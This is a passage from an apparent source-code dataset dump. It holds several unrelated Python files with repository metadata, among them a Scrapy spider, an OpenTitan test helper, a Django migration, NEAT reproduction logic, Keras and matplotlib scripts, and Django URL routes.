callback = 'parse_httpbin',
follow = True
),
)
def parse_httpbin( self, response ):
items = UwMadisonItem()
course = response.css('span.courseblockcode::text').extract()
title = response.css('div.sc_sccoursedescs > div.courseblock > p.courseblocktitle > strong::text').extract()
unit = response.css('.courseblockcredits::text').extract()
description = response.css('.courseblockdesc::text').extract()
prerequisites = response.css('p.courseblockextra.noindent.clearfix > span.cbextra-data > .bubblelink::text').extract()
items['course'] = course
items['title'] = title
items['unit'] = unit
items['description'] = description
items['prerequisites'] = prerequisites
yield items
| true | true |
7900e89dbe75340382e3e287beed972b744c3dca | 857 | py | Python | hw/ip/otbn/dv/otbnsim/test/testutil.py | draperlaboratory/opentitan | 5802fd8fddff95a905671054b1554f87c9ca6b96 | [
"Apache-2.0"
] | null | null | null | hw/ip/otbn/dv/otbnsim/test/testutil.py | draperlaboratory/opentitan | 5802fd8fddff95a905671054b1554f87c9ca6b96 | [
"Apache-2.0"
] | null | null | null | hw/ip/otbn/dv/otbnsim/test/testutil.py | draperlaboratory/opentitan | 5802fd8fddff95a905671054b1554f87c9ca6b96 | [
"Apache-2.0"
] | null | null | null | # Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
import os
import subprocess
OTBN_DIR = os.path.join(os.path.dirname(__file__), '../../..')
UTIL_DIR = os.path.join(OTBN_DIR, 'util')
SIM_DIR = os.path.join(os.path.dirname(__file__), '..')
def asm_and_link_one_file(asm_path: str, work_dir: str) -> str:
'''Assemble and link file at asm_path in work_dir.
Returns the path to the resulting ELF
'''
otbn_as = os.path.join(UTIL_DIR, 'otbn-as')
otbn_ld = os.path.join(UTIL_DIR, 'otbn-ld')
obj_path = os.path.join(work_dir, 'tst.o')
elf_path = os.path.join(work_dir, 'tst')
subprocess.run([otbn_as, '-o', obj_path, asm_path], check=True)
subprocess.run([otbn_ld, '-o', elf_path, obj_path], check=True)
return elf_path
| 30.607143 | 74 | 0.690782 |
import os
import subprocess
OTBN_DIR = os.path.join(os.path.dirname(__file__), '../../..')
UTIL_DIR = os.path.join(OTBN_DIR, 'util')
SIM_DIR = os.path.join(os.path.dirname(__file__), '..')
def asm_and_link_one_file(asm_path: str, work_dir: str) -> str:
otbn_as = os.path.join(UTIL_DIR, 'otbn-as')
otbn_ld = os.path.join(UTIL_DIR, 'otbn-ld')
obj_path = os.path.join(work_dir, 'tst.o')
elf_path = os.path.join(work_dir, 'tst')
subprocess.run([otbn_as, '-o', obj_path, asm_path], check=True)
subprocess.run([otbn_ld, '-o', elf_path, obj_path], check=True)
return elf_path
| true | true |
7900e8d40d67998b5d9cf4a9cb039c3f7628ea62 | 1,171 | py | Python | django_project/user_profile/migrations/0003_auto_20210526_1731.py | zhumakova/Django | f162b23d53883d3b0c654f8e7790f4bf93e20693 | [
"MIT"
] | 1 | 2021-06-12T19:08:57.000Z | 2021-06-12T19:08:57.000Z | django_project/user_profile/migrations/0003_auto_20210526_1731.py | zhumakova/Django | f162b23d53883d3b0c654f8e7790f4bf93e20693 | [
"MIT"
] | null | null | null | django_project/user_profile/migrations/0003_auto_20210526_1731.py | zhumakova/Django | f162b23d53883d3b0c654f8e7790f4bf93e20693 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.3 on 2021-05-26 11:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('spa', '0003_alter_service_master'),
('user_profile', '0002_auto_20210526_1647'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='age',
field=models.IntegerField(),
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(max_length=40)),
('service', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='spa.service')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
]
| 35.484848 | 130 | 0.624253 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('spa', '0003_alter_service_master'),
('user_profile', '0002_auto_20210526_1647'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='age',
field=models.IntegerField(),
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(max_length=40)),
('service', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='spa.service')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
7900e978294db63f482b38c5b128fdc347b80a61 | 8,371 | py | Python | neat_local/reproduction.py | Osrip/Novelty_criticality_PyTorch-NEAT | ff37eede4aea2cbb4075414a960477c215219f73 | [
"Apache-2.0"
] | null | null | null | neat_local/reproduction.py | Osrip/Novelty_criticality_PyTorch-NEAT | ff37eede4aea2cbb4075414a960477c215219f73 | [
"Apache-2.0"
] | null | null | null | neat_local/reproduction.py | Osrip/Novelty_criticality_PyTorch-NEAT | ff37eede4aea2cbb4075414a960477c215219f73 | [
"Apache-2.0"
] | null | null | null | """
Handles creation of genomes, either from scratch or by sexual or
asexual reproduction from parents.
"""
from __future__ import division
import math
import random
from itertools import count
from neat.config import ConfigParameter, DefaultClassConfig
from neat.math_util import mean
from neat.six_util import iteritems, itervalues
# TODO: Provide some sort of optional cross-species performance criteria, which
# are then used to control stagnation and possibly the mutation rate
# configuration. This scheme should be adaptive so that species do not evolve
# to become "cautious" and only make very slow progress.
class DefaultReproduction(DefaultClassConfig):
"""
Implements the default NEAT-python reproduction scheme:
explicit fitness sharing with fixed-time species stagnation.
"""
@classmethod
def parse_config(cls, param_dict):
return DefaultClassConfig(param_dict,
[ConfigParameter('elitism', int, 0),
ConfigParameter('survival_threshold', float, 0.2),
ConfigParameter('min_species_size', int, 2)])
def __init__(self, config, reporters, stagnation):
# pylint: disable=super-init-not-called
self.reproduction_config = config
self.reporters = reporters
self.genome_indexer = count(1)
self.stagnation = stagnation
self.ancestors = {}
def create_new(self, genome_type, genome_config, num_genomes):
new_genomes = {}
for i in range(num_genomes):
key = next(self.genome_indexer)
g = genome_type(key)
g.configure_new(genome_config)
new_genomes[key] = g
self.ancestors[key] = tuple()
return new_genomes
@staticmethod
def compute_spawn(adjusted_fitness, previous_sizes, pop_size, min_species_size):
"""Compute the proper number of offspring per species (proportional to fitness)."""
af_sum = sum(adjusted_fitness)
spawn_amounts = []
for af, ps in zip(adjusted_fitness, previous_sizes):
if af_sum > 0:
s = max(min_species_size, af / af_sum * pop_size)
else:
s = min_species_size
d = (s - ps) * 0.5
c = int(round(d))
spawn = ps
if abs(c) > 0:
spawn += c
elif d > 0:
spawn += 1
elif d < 0:
spawn -= 1
spawn_amounts.append(spawn)
# Normalize the spawn amounts so that the next generation is roughly
# the population size requested by the user.
total_spawn = sum(spawn_amounts)
norm = pop_size / total_spawn
spawn_amounts = [max(min_species_size, int(round(n * norm))) for n in spawn_amounts]
return spawn_amounts
def reproduce(self, config, species, pop_size, generation):
"""
Handles creation of genomes, either from scratch or by sexual or
asexual reproduction from parents.
"""
# TODO: I don't like this modification of the species and stagnation objects,
# because it requires internal knowledge of the objects.
# Filter out stagnated species, collect the set of non-stagnated
# species members, and compute their average adjusted fitness.
# The average adjusted fitness scheme (normalized to the interval
# [0, 1]) allows the use of negative fitness values without
# interfering with the shared fitness scheme.
all_fitnesses = []
remaining_species = []
for stag_sid, stag_s, stagnant in self.stagnation.update(species, generation):
if stagnant:
self.reporters.species_stagnant(stag_sid, stag_s)
else:
all_fitnesses.extend(m.fitness for m in itervalues(stag_s.members))
remaining_species.append(stag_s)
# The above comment was not quite what was happening - now getting fitnesses
# only from members of non-stagnated species.
# No species left.
if not remaining_species:
species.species = {}
return {} # was []
# Find minimum/maximum fitness across the entire population, for use in
# species adjusted fitness computation.
min_fitness = min(all_fitnesses)
max_fitness = max(all_fitnesses)
# Do not allow the fitness range to be zero, as we divide by it below.
# TODO: The ``1.0`` below is rather arbitrary, and should be configurable.
fitness_range = max(1.0, max_fitness - min_fitness)
for afs in remaining_species:
# Compute adjusted fitness.
msf = mean([m.fitness for m in itervalues(afs.members)])
af = (msf - min_fitness) / fitness_range
afs.adjusted_fitness = af
adjusted_fitnesses = [s.adjusted_fitness for s in remaining_species]
avg_adjusted_fitness = mean(adjusted_fitnesses) # type: float
self.reporters.info("Average adjusted fitness: {:.3f}".format(avg_adjusted_fitness))
# Compute the number of new members for each species in the new generation.
previous_sizes = [len(s.members) for s in remaining_species]
min_species_size = self.reproduction_config.min_species_size
# Isn't the effective min_species_size going to be max(min_species_size,
# self.reproduction_config.elitism)? That would probably produce more accurate tracking
# of population sizes and relative fitnesses... doing. TODO: document.
min_species_size = max(min_species_size,self.reproduction_config.elitism)
# TODO: THIS PROBABLY CAUSES POPULATION TO DOUBLE. Is an array of 2s of len ~232 here but ~ 112 in original
# TODO: BECAUSE OF ADJUSTED_FITNESSES ALSO BEING 232 INSTEAD OF 112
# TODO: 232 is number of species.. so probably rather an effect of increased population, not the cause...
spawn_amounts = self.compute_spawn(adjusted_fitnesses, previous_sizes,
pop_size, min_species_size)
new_population = {}
species.species = {}
for spawn, s in zip(spawn_amounts, remaining_species):
# If elitism is enabled, each species always at least gets to retain its elites.
spawn = max(spawn, self.reproduction_config.elitism)
assert spawn > 0
# The species has at least one member for the next generation, so retain it.
old_members = list(iteritems(s.members))
s.members = {}
species.species[s.key] = s
# Sort members in order of descending fitness.
old_members.sort(reverse=True, key=lambda x: x[1].fitness)
# Transfer elites to new generation.
if self.reproduction_config.elitism > 0:
for i, m in old_members[:self.reproduction_config.elitism]:
new_population[i] = m
spawn -= 1
if spawn <= 0:
continue
# Only use the survival threshold fraction to use as parents for the next generation.
repro_cutoff = int(math.ceil(self.reproduction_config.survival_threshold *
len(old_members)))
# Use at least two parents no matter what the threshold fraction result is.
repro_cutoff = max(repro_cutoff, 2)
old_members = old_members[:repro_cutoff]
# Randomly choose parents and produce the number of offspring allotted to the species.
while spawn > 0:
spawn -= 1
parent1_id, parent1 = random.choice(old_members)
parent2_id, parent2 = random.choice(old_members)
# Note that if the parents are not distinct, crossover will produce a
# genetically identical clone of the parent (but with a different ID).
gid = next(self.genome_indexer)
child = config.genome_type(gid)
child.configure_crossover(parent1, parent2, config.genome_config)
child.mutate(config.genome_config)
new_population[gid] = child
self.ancestors[gid] = (parent1_id, parent2_id)
return new_population
| 43.598958 | 115 | 0.632899 | from __future__ import division
import math
import random
from itertools import count
from neat.config import ConfigParameter, DefaultClassConfig
from neat.math_util import mean
from neat.six_util import iteritems, itervalues
class DefaultReproduction(DefaultClassConfig):
@classmethod
def parse_config(cls, param_dict):
return DefaultClassConfig(param_dict,
[ConfigParameter('elitism', int, 0),
ConfigParameter('survival_threshold', float, 0.2),
ConfigParameter('min_species_size', int, 2)])
def __init__(self, config, reporters, stagnation):
self.reproduction_config = config
self.reporters = reporters
self.genome_indexer = count(1)
self.stagnation = stagnation
self.ancestors = {}
def create_new(self, genome_type, genome_config, num_genomes):
new_genomes = {}
for i in range(num_genomes):
key = next(self.genome_indexer)
g = genome_type(key)
g.configure_new(genome_config)
new_genomes[key] = g
self.ancestors[key] = tuple()
return new_genomes
@staticmethod
def compute_spawn(adjusted_fitness, previous_sizes, pop_size, min_species_size):
af_sum = sum(adjusted_fitness)
spawn_amounts = []
for af, ps in zip(adjusted_fitness, previous_sizes):
if af_sum > 0:
s = max(min_species_size, af / af_sum * pop_size)
else:
s = min_species_size
d = (s - ps) * 0.5
c = int(round(d))
spawn = ps
if abs(c) > 0:
spawn += c
elif d > 0:
spawn += 1
elif d < 0:
spawn -= 1
spawn_amounts.append(spawn)
total_spawn = sum(spawn_amounts)
norm = pop_size / total_spawn
spawn_amounts = [max(min_species_size, int(round(n * norm))) for n in spawn_amounts]
return spawn_amounts
def reproduce(self, config, species, pop_size, generation):
# because it requires internal knowledge of the objects.
# Filter out stagnated species, collect the set of non-stagnated
# species members, and compute their average adjusted fitness.
# The average adjusted fitness scheme (normalized to the interval
# [0, 1]) allows the use of negative fitness values without
# interfering with the shared fitness scheme.
all_fitnesses = []
remaining_species = []
for stag_sid, stag_s, stagnant in self.stagnation.update(species, generation):
if stagnant:
self.reporters.species_stagnant(stag_sid, stag_s)
else:
all_fitnesses.extend(m.fitness for m in itervalues(stag_s.members))
remaining_species.append(stag_s)
# The above comment was not quite what was happening - now getting fitnesses
# only from members of non-stagnated species.
# No species left.
if not remaining_species:
species.species = {}
return {} # was []
# Find minimum/maximum fitness across the entire population, for use in
# species adjusted fitness computation.
min_fitness = min(all_fitnesses)
max_fitness = max(all_fitnesses)
# Do not allow the fitness range to be zero, as we divide by it below.
# TODO: The ``1.0`` below is rather arbitrary, and should be configurable.
fitness_range = max(1.0, max_fitness - min_fitness)
for afs in remaining_species:
# Compute adjusted fitness.
msf = mean([m.fitness for m in itervalues(afs.members)])
af = (msf - min_fitness) / fitness_range
afs.adjusted_fitness = af
adjusted_fitnesses = [s.adjusted_fitness for s in remaining_species]
avg_adjusted_fitness = mean(adjusted_fitnesses) # type: float
self.reporters.info("Average adjusted fitness: {:.3f}".format(avg_adjusted_fitness))
# Compute the number of new members for each species in the new generation.
previous_sizes = [len(s.members) for s in remaining_species]
min_species_size = self.reproduction_config.min_species_size
# Isn't the effective min_species_size going to be max(min_species_size,
min_species_size = max(min_species_size,self.reproduction_config.elitism)
spawn_amounts = self.compute_spawn(adjusted_fitnesses, previous_sizes,
pop_size, min_species_size)
new_population = {}
species.species = {}
for spawn, s in zip(spawn_amounts, remaining_species):
spawn = max(spawn, self.reproduction_config.elitism)
assert spawn > 0
old_members = list(iteritems(s.members))
s.members = {}
species.species[s.key] = s
old_members.sort(reverse=True, key=lambda x: x[1].fitness)
if self.reproduction_config.elitism > 0:
for i, m in old_members[:self.reproduction_config.elitism]:
new_population[i] = m
spawn -= 1
if spawn <= 0:
continue
repro_cutoff = int(math.ceil(self.reproduction_config.survival_threshold *
len(old_members)))
repro_cutoff = max(repro_cutoff, 2)
old_members = old_members[:repro_cutoff]
while spawn > 0:
spawn -= 1
parent1_id, parent1 = random.choice(old_members)
parent2_id, parent2 = random.choice(old_members)
gid = next(self.genome_indexer)
child = config.genome_type(gid)
child.configure_crossover(parent1, parent2, config.genome_config)
child.mutate(config.genome_config)
new_population[gid] = child
self.ancestors[gid] = (parent1_id, parent2_id)
return new_population
| true | true |
7900ea3e9c2dea2b931ed456e64ca581ba00efea | 1,325 | py | Python | Word2Vec/NearestNeighbor.py | bi3mer/Word2Vec | 55297c4f10c5dbfdcaf93b01282808efdd275956 | [
"MIT"
] | null | null | null | Word2Vec/NearestNeighbor.py | bi3mer/Word2Vec | 55297c4f10c5dbfdcaf93b01282808efdd275956 | [
"MIT"
] | null | null | null | Word2Vec/NearestNeighbor.py | bi3mer/Word2Vec | 55297c4f10c5dbfdcaf93b01282808efdd275956 | [
"MIT"
] | null | null | null | from heapq import heappush, nsmallest
import numpy as np
class NearestNeighbor():
def __init__(self, embeddings, encodings, config):
self.embeddings = embeddings
self.encodings = encodings
self.config = config
def euclidian_distance(self, e1, e2):
'''
https://stackoverflow.com/questions/1401712/how-can-the-euclidean-distance-be-calculated-with-numpy
'''
return np.linalg.norm(e1 - e2)
def get_embedding(self, word):
if self.encodings.word_in_vocab(word):
return self.embeddings[word]
return self.embeddings[config.unknown_word]
def nearest_neighbors(self, word, count=1):
embedding = self.get_embedding(word)
heap = []
# TODO: is it faster to not have the the string comparision and instead always
# remove the first element of the array which will have a distance of 0
# TODO: implement faster solution than the heap where it only keeps track of K
# values which should vastly reduce the number of operations required.
for w in self.embeddings:
if w == word:
continue
dist = self.euclidian_distance(embedding, self.embeddings[w])
heappush(heap, (dist, w))
return nsmallest(count, heap)
| 34.868421 | 107 | 0.644528 | from heapq import heappush, nsmallest
import numpy as np
class NearestNeighbor():
def __init__(self, embeddings, encodings, config):
self.embeddings = embeddings
self.encodings = encodings
self.config = config
def euclidian_distance(self, e1, e2):
return np.linalg.norm(e1 - e2)
def get_embedding(self, word):
if self.encodings.word_in_vocab(word):
return self.embeddings[word]
return self.embeddings[config.unknown_word]
def nearest_neighbors(self, word, count=1):
embedding = self.get_embedding(word)
heap = []
for w in self.embeddings:
if w == word:
continue
dist = self.euclidian_distance(embedding, self.embeddings[w])
heappush(heap, (dist, w))
return nsmallest(count, heap)
| true | true |
7900eb0e380c4e74be31902804ff4f3e26c91d4d | 732 | py | Python | channel_attention.py | ailabnjtech/B-CNN | 40b78f0fe81120248832609f897be5d04e8d8431 | [
"MIT"
] | null | null | null | channel_attention.py | ailabnjtech/B-CNN | 40b78f0fe81120248832609f897be5d04e8d8431 | [
"MIT"
] | null | null | null | channel_attention.py | ailabnjtech/B-CNN | 40b78f0fe81120248832609f897be5d04e8d8431 | [
"MIT"
] | null | null | null | from keras.layers import Activation, Reshape, Lambda, dot, add
from keras.layers import Conv1D, Conv2D, Conv3D
from keras.layers import MaxPool1D,GlobalAveragePooling2D,Dense,multiply,Activation,concatenate
from keras import backend as K
def squeeze_excitation_layer(x, out_dim, ratio = 4, concate = True):
squeeze = GlobalAveragePooling2D()(x)
excitation = Dense(units=out_dim // ratio)(squeeze)
excitation = Activation('relu')(excitation)
excitation = Dense(units=out_dim)(excitation)
excitation = Activation('sigmoid')(excitation)
excitation = Reshape((1, 1, out_dim))(excitation)
scale = multiply([x, excitation])
if concate:
scale = concatenate([scale, x],axis=3)
return scale
| 33.272727 | 95 | 0.73224 | from keras.layers import Activation, Reshape, Lambda, dot, add
from keras.layers import Conv1D, Conv2D, Conv3D
from keras.layers import MaxPool1D,GlobalAveragePooling2D,Dense,multiply,Activation,concatenate
from keras import backend as K
def squeeze_excitation_layer(x, out_dim, ratio = 4, concate = True):
squeeze = GlobalAveragePooling2D()(x)
excitation = Dense(units=out_dim // ratio)(squeeze)
excitation = Activation('relu')(excitation)
excitation = Dense(units=out_dim)(excitation)
excitation = Activation('sigmoid')(excitation)
excitation = Reshape((1, 1, out_dim))(excitation)
scale = multiply([x, excitation])
if concate:
scale = concatenate([scale, x],axis=3)
return scale
| true | true |
7900ec820b3c3959c1571e60fa82f639ad549104 | 3,089 | py | Python | api_tests/reviews/mixins/comment_settings.py | listinc/osf.io | b9a0357f3e9b6e905b732e750a16e9452c459d78 | [
"Apache-2.0"
] | null | null | null | api_tests/reviews/mixins/comment_settings.py | listinc/osf.io | b9a0357f3e9b6e905b732e750a16e9452c459d78 | [
"Apache-2.0"
] | null | null | null | api_tests/reviews/mixins/comment_settings.py | listinc/osf.io | b9a0357f3e9b6e905b732e750a16e9452c459d78 | [
"Apache-2.0"
] | null | null | null | import pytest
from api.providers.permissions import GroupHelper
from osf_tests.factories import (
ReviewActionFactory,
AuthUserFactory,
PreprintFactory,
PreprintProviderFactory,
)
from osf.utils import permissions as osf_permissions
@pytest.mark.django_db
class ReviewActionCommentSettingsMixin(object):
@pytest.fixture()
def url(self):
raise NotImplementedError
@pytest.fixture()
def provider(self):
return PreprintProviderFactory()
@pytest.fixture()
def preprint(self, provider):
return PreprintFactory(provider=provider)
@pytest.fixture()
def actions(self, preprint):
return [ReviewActionFactory(target=preprint) for _ in range(5)]
@pytest.fixture()
def provider_admin(self, provider):
user = AuthUserFactory()
user.groups.add(GroupHelper(provider).get_group('admin'))
return user
@pytest.fixture()
def provider_moderator(self, provider):
user = AuthUserFactory()
user.groups.add(GroupHelper(provider).get_group('moderator'))
return user
@pytest.fixture()
def node_admin(self, preprint):
user = AuthUserFactory()
preprint.node.add_contributor(
user,
permissions=[
osf_permissions.READ,
osf_permissions.WRITE,
osf_permissions.ADMIN])
return user
def test_comment_settings(
self, app, url, provider, actions, provider_admin,
provider_moderator, node_admin):
expected_ids = set([l._id for l in actions])
for anonymous in [True, False]:
for private in [True, False]:
provider.reviews_comments_anonymous = anonymous
provider.reviews_comments_private = private
provider.save()
# admin always sees comment/creator
res = app.get(url, auth=provider_admin.auth)
self.__assert_fields(res, expected_ids, False, False)
# moderator always sees comment/creator
res = app.get(url, auth=provider_moderator.auth)
self.__assert_fields(res, expected_ids, False, False)
# node admin sees what the settings allow
res = app.get(url, auth=node_admin.auth)
self.__assert_fields(res, expected_ids, anonymous, private)
def __assert_fields(
self, res, expected_ids, hidden_creator, hidden_comment):
data = res.json['data']
actual_ids = set([l['id'] for l in data])
if expected_ids != actual_ids:
raise Exception((expected_ids, actual_ids))
assert expected_ids == actual_ids
for action in data:
if hidden_creator:
assert 'creator' not in action['relationships']
else:
assert 'creator' in action['relationships']
if hidden_comment:
assert 'comment' not in action['attributes']
else:
assert 'comment' in action['attributes']
| 32.861702 | 75 | 0.620913 | import pytest
from api.providers.permissions import GroupHelper
from osf_tests.factories import (
ReviewActionFactory,
AuthUserFactory,
PreprintFactory,
PreprintProviderFactory,
)
from osf.utils import permissions as osf_permissions
@pytest.mark.django_db
class ReviewActionCommentSettingsMixin(object):
@pytest.fixture()
def url(self):
raise NotImplementedError
@pytest.fixture()
def provider(self):
return PreprintProviderFactory()
@pytest.fixture()
def preprint(self, provider):
return PreprintFactory(provider=provider)
@pytest.fixture()
def actions(self, preprint):
return [ReviewActionFactory(target=preprint) for _ in range(5)]
@pytest.fixture()
def provider_admin(self, provider):
user = AuthUserFactory()
user.groups.add(GroupHelper(provider).get_group('admin'))
return user
@pytest.fixture()
def provider_moderator(self, provider):
user = AuthUserFactory()
user.groups.add(GroupHelper(provider).get_group('moderator'))
return user
@pytest.fixture()
def node_admin(self, preprint):
user = AuthUserFactory()
preprint.node.add_contributor(
user,
permissions=[
osf_permissions.READ,
osf_permissions.WRITE,
osf_permissions.ADMIN])
return user
def test_comment_settings(
self, app, url, provider, actions, provider_admin,
provider_moderator, node_admin):
expected_ids = set([l._id for l in actions])
for anonymous in [True, False]:
for private in [True, False]:
provider.reviews_comments_anonymous = anonymous
provider.reviews_comments_private = private
provider.save()
res = app.get(url, auth=provider_admin.auth)
self.__assert_fields(res, expected_ids, False, False)
res = app.get(url, auth=provider_moderator.auth)
self.__assert_fields(res, expected_ids, False, False)
res = app.get(url, auth=node_admin.auth)
self.__assert_fields(res, expected_ids, anonymous, private)
def __assert_fields(
self, res, expected_ids, hidden_creator, hidden_comment):
data = res.json['data']
actual_ids = set([l['id'] for l in data])
if expected_ids != actual_ids:
raise Exception((expected_ids, actual_ids))
assert expected_ids == actual_ids
for action in data:
if hidden_creator:
assert 'creator' not in action['relationships']
else:
assert 'creator' in action['relationships']
if hidden_comment:
assert 'comment' not in action['attributes']
else:
assert 'comment' in action['attributes']
| true | true |
7900eeb2cc19614f887b36c04f3ef1edcb977717 | 2,189 | py | Python | figures/fig3_baf_time_series/baf_TS_plot_lyso_hist.py | jlazzaridean/mScarlet_lifetime_reports_pH | 13b022b1dc1fff8ebd0a881248011923e378889b | [
"CC-BY-4.0"
] | null | null | null | figures/fig3_baf_time_series/baf_TS_plot_lyso_hist.py | jlazzaridean/mScarlet_lifetime_reports_pH | 13b022b1dc1fff8ebd0a881248011923e378889b | [
"CC-BY-4.0"
] | null | null | null | figures/fig3_baf_time_series/baf_TS_plot_lyso_hist.py | jlazzaridean/mScarlet_lifetime_reports_pH | 13b022b1dc1fff8ebd0a881248011923e378889b | [
"CC-BY-4.0"
] | null | null | null | from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import Divider, Size
import pandas as pd
# This script plots histograms of pHlys by lysosome from two particular
# recordings (DMSO 10/29 01, pos 5; Baf 10/29 01 pos 9) for use in main
# text figure 3.
current_dir = Path.cwd()
man_dir = current_dir.parents[1]
data_path = man_dir / 'source_data' / 'bafilomycin_time_series' / 'baf_time_series_individ_lyso_results.csv'
results = pd.read_csv(data_path)
# basic plot setup
plt.style.use(man_dir / 'figures' / 'default.mplstyle')
cycle = plt.rcParams['axes.prop_cycle'].by_key()['color']
# locate the particular recording and position
temp = results.loc[results['date'] == 20211029]
temp1 = temp.loc[temp['recording'] == 1]
baf = temp1.loc[temp1['position'] == 9]
dmso = temp1.loc[temp1['position'] == 5]
assert np.max(dmso['mean_tau_ns'].values) < 5
assert np.max(baf['mean_tau_ns'].values) < 5
assert np.min(dmso['mean_tau_ns'].values) > 1
assert np.min(baf['mean_tau_ns'].values) > 1
bin_list = np.linspace(1, 5, num=40)
for x in range(12):
# figure setup
fig1 = plt.figure(figsize=(3,3), dpi=300)
h = [Size.Fixed(1.0), Size.Fixed(1)]
v = [Size.Fixed(0.7), Size.Fixed(1)]
divider = Divider(fig1, (0, 0, 1, 1), h, v, aspect=False)
axs1 = fig1.add_axes(divider.get_position(),
axes_locator=divider.new_locator(nx=1, ny=1))
# find and plot the correct data
this_frame_dmso = dmso.loc[dmso['frame_ID'] == x+1]
axs1.hist(this_frame_dmso['mean_tau_ns'].values, bins=bin_list, alpha=0.5,
label='DMSO')
this_frame_baf = baf.loc[baf['frame_ID'] == x+1]
axs1.hist(this_frame_baf['mean_tau_ns'].values, bins=bin_list, alpha=0.5,
label='BafA')
# formatting
axs1.set_ylabel('# Lysosomes')
axs1.set_xlabel('Lifetime (ns)')
axs1.set_xlim(1, 5)
axs1.set_ylim(0, 60)
axs1.set_title('%d min' % (x * 5 - 8)) # time 0 = when baf was added
axs1.legend()
out_path = current_dir / 'one_fov' / ('baf_dmso_hist_oneFOV_t%d.pdf'%x)
fig1.savefig(out_path, bbox_inches='tight',
transparent=True)
plt.show()
| 37.741379 | 108 | 0.67428 | from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import Divider, Size
import pandas as pd
current_dir = Path.cwd()
man_dir = current_dir.parents[1]
data_path = man_dir / 'source_data' / 'bafilomycin_time_series' / 'baf_time_series_individ_lyso_results.csv'
results = pd.read_csv(data_path)
plt.style.use(man_dir / 'figures' / 'default.mplstyle')
cycle = plt.rcParams['axes.prop_cycle'].by_key()['color']
temp = results.loc[results['date'] == 20211029]
temp1 = temp.loc[temp['recording'] == 1]
baf = temp1.loc[temp1['position'] == 9]
dmso = temp1.loc[temp1['position'] == 5]
assert np.max(dmso['mean_tau_ns'].values) < 5
assert np.max(baf['mean_tau_ns'].values) < 5
assert np.min(dmso['mean_tau_ns'].values) > 1
assert np.min(baf['mean_tau_ns'].values) > 1
bin_list = np.linspace(1, 5, num=40)
for x in range(12):
fig1 = plt.figure(figsize=(3,3), dpi=300)
h = [Size.Fixed(1.0), Size.Fixed(1)]
v = [Size.Fixed(0.7), Size.Fixed(1)]
divider = Divider(fig1, (0, 0, 1, 1), h, v, aspect=False)
axs1 = fig1.add_axes(divider.get_position(),
axes_locator=divider.new_locator(nx=1, ny=1))
this_frame_dmso = dmso.loc[dmso['frame_ID'] == x+1]
axs1.hist(this_frame_dmso['mean_tau_ns'].values, bins=bin_list, alpha=0.5,
label='DMSO')
this_frame_baf = baf.loc[baf['frame_ID'] == x+1]
axs1.hist(this_frame_baf['mean_tau_ns'].values, bins=bin_list, alpha=0.5,
label='BafA')
axs1.set_ylabel('# Lysosomes')
axs1.set_xlabel('Lifetime (ns)')
axs1.set_xlim(1, 5)
axs1.set_ylim(0, 60)
axs1.set_title('%d min' % (x * 5 - 8))
axs1.legend()
out_path = current_dir / 'one_fov' / ('baf_dmso_hist_oneFOV_t%d.pdf'%x)
fig1.savefig(out_path, bbox_inches='tight',
transparent=True)
plt.show()
| true | true |
7900f081a429cddbd00caa87f27fe51153cc6f27 | 6,431 | py | Python | Q/questionnaire/q_urls.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | null | null | null | Q/questionnaire/q_urls.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | 477 | 2015-01-07T18:22:27.000Z | 2017-07-17T15:05:48.000Z | Q/questionnaire/q_urls.py | ES-DOC/esdoc-questionnaire | 9301eda375c4046323265b37ba96d94c94bf8b11 | [
"MIT"
] | null | null | null | ####################
# ES-DOC CIM Questionnaire
# Copyright (c) 2017 ES-DOC. All rights reserved.
#
# University of Colorado, Boulder
# http://cires.colorado.edu/
#
# This project is distributed according to the terms of the MIT license [http://www.opensource.org/licenses/MIT].
####################
from django.conf import settings
from django.conf.urls import patterns, url, include
from django.views.generic.base import RedirectView
from rest_framework.urlpatterns import format_suffix_patterns
from Q.questionnaire.views import *
from Q.questionnaire.views.api import *
from Q.questionnaire.views.services import *
from Q.questionnaire.views.views_feed import QFeed, q_publication
api_urls = patterns('',
# just some testing (obviously)...
url(r'^projects_test/(?P<pk>[0-9]+)/$', QProjectTestDetail.as_view(), name="project-test-detail"),
# just some lite serializations for populating the project page...
url(r'^customizations_lite/$', QCustomizationLiteList.as_view(), name="customization_lite-list"),
url(r'^realizations_lite/$', QRealizationLiteList.as_view(), name="realization_lite-list"),
url(r'^projects_lite/$', QProjectLiteList.as_view(), name="project_lite-list"),
url(r'^projects_lite/(?P<pk>[0-9]+)/$', QProjectLiteDetail.as_view(), name="project_lite-detail"),
# getting project info...
url(r'^projects/$', QProjectList.as_view(), name="project-list"),
url(r'^projects/(?P<pk>[0-9]+)/$', QProjectDetail.as_view(), name="project-detail"),
# getting ontology info...
url(r'^ontologies/$', QOntologyList.as_view(), name="ontology-list"),
# getting customization info...
url(r'^customizations/$', QModelCustomizationList.as_view(), name="customization-list"),
